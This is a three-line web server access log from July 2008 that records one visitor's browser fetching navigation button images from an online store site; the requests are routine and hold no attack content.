211.106.136.70 - - [01/Jul/2008:02:53:33 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:33 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
211.106.136.70 - - [01/Jul/2008:02:53:33 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+LDF7EC3247B101600F83306E+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ko; rv:1.9) Gecko/2008052906 Firefox/3.0"
